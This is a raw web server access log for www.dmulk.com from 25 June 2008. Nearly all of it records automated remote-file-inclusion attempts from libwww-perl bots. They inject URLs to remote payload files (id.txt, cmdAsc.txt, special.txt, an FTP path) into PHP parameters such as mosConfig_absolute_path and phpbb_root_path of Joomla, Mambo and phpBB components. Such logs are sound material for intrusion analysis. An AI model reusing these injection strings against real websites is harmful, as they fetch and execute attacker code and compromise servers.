203.57.68.22 - - [25/Jun/2008:12:15:48 -0700] "GET /logs/access_071230.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:48 -0700] "GET /logs/access_071230.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:12:15:51 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:12:15:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:12:15:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:12:15:52 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:53 -0700] "GET /logs/access_071230.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:16:04 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:16:04 -0700] "GET /facileforms.frame.php?ff_compath=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:12:16:24 -0700] "GET /logs/access_080215.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:16:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:16:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:12:16:43 -0700] "GET /logs/access_080215.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:16:49 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:16:49 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:16:50 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:16:50 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:16:50 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:16:51 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:16:58 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.29 - - [25/Jun/2008:12:17:23 -0700] "GET /mobilehackers/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:17:48 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:18:01 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.1.32.12 - - [25/Jun/2008:12:18:12 -0700] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
69.12.112.5 - - [25/Jun/2008:12:18:15 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.12.112.5 - - [25/Jun/2008:12:18:15 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.12.112.5 - - [25/Jun/2008:12:18:15 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:12:18:16 -0700] "GET /logs/index.php?body=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:12:18:19 -0700] "GET /index.php?body=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.805" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:18:29 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:18:29 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:18:29 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:18:34 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:18:38 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:18:42 -0700] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:18:44 -0700] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 200 18551 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:18:45 -0700] "GET /logs/access_080301.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_user_extended&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:56 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:57 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:57 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:58 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:59 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:59 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:59 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:18:59 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:19:00 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:19:02 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:19:02 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:12:19:29 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:12:19:29 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:12:19:30 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.32.12 - - [25/Jun/2008:12:19:36 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [25/Jun/2008:12:19:36 -0700] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [25/Jun/2008:12:19:37 -0700] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:20:10 -0700] "GET /bikes/dteel/?D=D HTTP/1.0" 200 9640 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:20:21 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:20:23 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:20:28 -0700] "GET /logs/errors.php?error=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:20:28 -0700] "GET /errors.php?error=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:20:51 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:20:52 -0700] "GET /logs/access_080423.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:20:54 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:20:55 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:20:57 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:21:02 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:21:05 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:21:05 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:12:21:14 -0700] "GET /logs/access_071224.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:12:21:14 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:12:21:15 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:21:16 -0700] "GET /classes/core/language.php?rootdir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:21:17 -0700] "GET /classes/core/language.php?rootdir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:12:21:24 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.252.3.200 - - [25/Jun/2008:12:22:17 -0700] "GET /index.php?side=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.803" "www.dmulk.com"
122.249.233.191 - - [25/Jun/2008:12:22:41 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunsweet.info/learn/ganteng?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.200.210 - - [25/Jun/2008:12:22:52 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.200.210 - - [25/Jun/2008:12:22:52 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.200.210 - - [25/Jun/2008:12:22:52 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:22:53 -0700] "GET /logs/errors.php?error=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:22:53 -0700] "GET /errors.php?error=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:22:54 -0700] "GET /logs/errors.php?error=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:12:22:54 -0700] "GET /errors.php?error=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.27.98 - - [25/Jun/2008:12:23:00 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [25/Jun/2008:12:23:01 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [25/Jun/2008:12:23:01 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:23:03 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:23:06 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 200 18483 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:23:06 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:12:23:08 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:12:23:10 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18421 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:23:29 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:23:29 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:23:29 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.200.210 - - [25/Jun/2008:12:23:34 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [25/Jun/2008:12:23:36 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.20.73.217 - - [25/Jun/2008:12:23:37 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.20.73.217 - - [25/Jun/2008:12:23:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:12:23:37 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:12:23:37 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:12:23:38 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:12:23:45 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:24:01 -0700] "GET /logs/access_080215.log/page.php?doc=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:24:01 -0700] "GET /logs/page.php?doc=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:24:05 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:24:05 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:24:07 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:24:08 -0700] "GET /logs//atom.php5?page=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.200.210 - - [25/Jun/2008:12:24:11 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.200.210 - - [25/Jun/2008:12:24:11 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:12:24:15 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:12:24:16 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:12:24:16 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:24:18 -0700] "GET //atom.php5?page=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:24:21 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.74.144.24 - - [25/Jun/2008:12:24:29 -0700] "GET /main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:24:37 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:24:45 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:24:45 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:25:04 -0700] "GET /logs/access_080331.log/page.php?doc=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
119.2.47.4 - - [25/Jun/2008:12:25:07 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
119.2.47.4 - - [25/Jun/2008:12:25:08 -0700] "GET /errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
119.2.47.4 - - [25/Jun/2008:12:25:09 -0700] "GET /logs/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:25:37 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:25:37 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
